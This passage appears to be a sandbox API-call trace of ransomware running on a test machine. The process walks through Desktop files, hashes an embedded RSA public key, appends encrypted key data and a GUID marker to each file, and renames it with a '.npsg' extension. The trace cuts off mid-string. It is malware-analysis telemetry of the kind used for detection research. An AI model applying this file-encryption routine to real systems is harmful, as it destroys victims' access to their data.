[0237.279] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.280] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a87c0 | out: hHeap=0x620000) returned 1 [0237.281] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf317fc60, ftCreationTime.dwHighDateTime=0x1d5b5d3, ftLastAccessTime.dwLowDateTime=0x784e0420, ftLastAccessTime.dwHighDateTime=0x1d5b89e, ftLastWriteTime.dwLowDateTime=0x784e0420, ftLastWriteTime.dwHighDateTime=0x1d5b89e, nFileSizeHigh=0x0, nFileSizeLow=0x5f2f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Vj12p8AcN.png", cAlternateFileName="VJ12P8~1.PNG")) returned 1 [0237.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.281] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.281] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a7f8 | out: hHeap=0x620000) returned 1 [0237.281] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\Vj12p8AcN.png") returned=".png" [0237.281] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\Vj12p8AcN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\vj12p8acn.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.282] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=24367) returned 1 [0237.282] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.284] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f09, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.284] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.286] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.286] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.286] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x5f2f, lpOverlapped=0x0) returned 1 [0237.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.287] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.287] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.288] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.288] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.288] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.288] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.288] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.288] GetLastError () returned 0x0 [0237.288] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.288] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.288] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0237.288] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.288] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.289] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5f30) returned 0x3b83cd0 [0237.289] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.289] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecbc8 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408f30 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400518 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3408f78 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400530 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400560 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005c0 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400578 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0237.289] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.289] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34005c0 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400578 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3400560 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b830 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b948 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400578 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400560 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34005c0 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecbc8 | out: hHeap=0x620000) returned 1 [0237.290] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0237.290] GetCurrentThreadId () returned 0x5b4 [0237.290] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b81e98 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x6affc0 [0237.291] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0237.291] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x5f2f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.291] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.292] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.292] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.292] CloseHandle (hObject=0x644) returned 1 [0237.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0237.293] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0237.293] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\Vj12p8AcN.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\vj12p8acn.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\Vj12p8AcN.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\vj12p8acn.png.npsg")) returned 1 [0237.295] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ac2850, ftCreationTime.dwHighDateTime=0x1d5b8d4, ftLastAccessTime.dwLowDateTime=0x3ebf00f0, ftLastAccessTime.dwHighDateTime=0x1d5b8a4, ftLastWriteTime.dwLowDateTime=0x3ebf00f0, ftLastWriteTime.dwHighDateTime=0x1d5b8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd211, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YgeYRwOrx4brXG.wav", cAlternateFileName="YGEYRW~1.WAV")) returned 1 [0237.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.295] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\YgeYRwOrx4brXG.wav") returned=".wav" [0237.295] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\YgeYRwOrx4brXG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ygeyrworx4brxg.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.295] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=53777) returned 1 [0237.295] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.298] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd1eb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.298] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.301] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xd211, lpOverlapped=0x0) returned 1 [0237.302] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0237.302] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.302] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0237.302] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a7f8) returned 1 [0237.303] CryptCreateHash (in: hProv=0x67a7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0237.303] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0237.303] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0237.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0237.303] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0237.304] GetLastError () returned 0x0 [0237.304] CryptDestroyHash (hHash=0x33f0408) returned 1 [0237.304] CryptReleaseContext (hProv=0x67a7f8, dwFlags=0x0) returned 1 [0237.304] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0237.304] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0237.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0237.304] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0237.304] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0237.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0237.305] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xd211, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.305] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0237.305] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.305] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0237.306] CloseHandle (hObject=0x644) returned 1 [0237.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x3b8d7c0 [0237.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b83cd0 [0237.308] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\YgeYRwOrx4brXG.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ygeyrworx4brxg.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\YgeYRwOrx4brXG.wav.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\ygeyrworx4brxg.wav.npsg")) returned 1 [0237.310] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b2cd620, ftCreationTime.dwHighDateTime=0x1d5c091, ftLastAccessTime.dwLowDateTime=0xf3928d60, ftLastAccessTime.dwHighDateTime=0x1d5b7b1, ftLastWriteTime.dwLowDateTime=0xf3928d60, ftLastWriteTime.dwHighDateTime=0x1d5b7b1, nFileSizeHigh=0x0, nFileSizeLow=0xf3ac, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_U 7JKtu.wav", cAlternateFileName="_U7JKT~1.WAV")) returned 1 [0237.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a7f8 [0237.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xbe) returned 0x33a87c0 [0237.310] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\_U 7JKtu.wav") returned=".wav" [0237.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gDzXHkl4U_l2Ylj0rT\\_U 7JKtu.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gdzxhkl4u_l2ylj0rt\\_u 7jktu.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0237.312] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=62380) returned 1 [0237.313] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0237.316] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0xf386, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.316] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0237.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0237.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0237.321] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.321] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0xf3ac, lpOverlapped=0x0) returned 1 [0237.322] lstrlenA (lpString="-----BEGIN PUBLIC 